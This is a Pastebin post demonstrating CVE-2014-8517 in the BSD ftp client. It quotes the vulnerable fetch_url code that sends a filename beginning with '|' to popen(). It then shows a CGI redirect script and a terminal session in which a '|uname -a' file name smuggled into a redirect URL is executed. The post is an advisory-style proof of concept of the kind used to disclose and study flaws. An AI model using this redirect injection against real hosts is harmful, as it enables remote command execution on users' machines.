Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- eminghuliev
- FreeBSD FTP code execution
- CVE ID: CVE-2014-8517
- ___ snippet ___
- ==== > fetch_url(const char *url, const char *proxyenv, char *proxyauth, char *wwwauth)
- /*
- * Only trust filenames with special meaning if they came from
- * the command line
- */
- if (outfile == savefile) {
- if (strcmp(savefile, "-") == 0) {
- fout = stdout;
- } else if (*savefile == '|') {
- oldpipe = xsignal(SIGPIPE, SIG_IGN);
- fout = popen(savefile + 1, "w");
- if (fout == NULL) {
- warn("Can't execute `%s'", savefile + 1);
- goto cleanup_fetch_url;
- }
- closefunc = pclose;
- }
- }
- Output filename if contain "|" symbol and command execute.
- |||||| If the sent pipe symbol, popen function is being to execute
- proof ?
- else if (*savefile == '|') {
- === > fout = popen(savefile + 1, "w");
- popen function describe:
- popen - initiate pipe streams to or from a process
- The popen() function shall execute the command specified by the string command. It shall create a pipe between the calling program and the executed command, and shall return a pointer to a stream that can be used to either read from or write to the pipe. The environment of the executed command shall be as if a child process were created within the popen() call using the fork() function, and the child invoked the sh utility using the call:
- a20$ pwd
- /var/www/cgi-bin
- a20$ ls -l
- total 4
- -rwxr-xr-x 1 root wheel 159 Oct 14 02:02 redirect
- -rwxr-xr-x 1 root wheel 178 Oct 14 01:54 |uname -a
- a20$ cat redirect
- #!/bin/sh
- echo 'Status: 302 Found'
- echo 'Content-Type: text/html'
- echo 'Connection: keep-alive'
- echo 'Location: http://192.168.2.19/cgi-bin/|uname%20-a'
- echo
- a20$
- a20$ ftp http://localhost/cgi-bin/redirect
- Trying ::1:80 ...
- ftp: Can't connect to `::1:80': Connection refused
- Trying 127.0.0.1:80 ...
- Requesting http://localhost/cgi-bin/redirect
- Redirected to http://192.168.2.19/cgi-bin/|uname%20-a
- Requesting http://192.168.2.19/cgi-bin/|uname%20-a
- 32 101.46 KiB/s
- 32 bytes retrieved in 00:00 (78.51 KiB/s)
- NetBSD a20 7.99.1 NetBSD 7.99.1 (CUBIEBOARD) #113: Sun Oct 26 12:05:36
- reference:
- http://pubs.opengroup.org/onlinepubs/009695399/functions/popen.html
- http://seclists.org/oss-sec/2014/q4/459
- @st1ll_di3
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement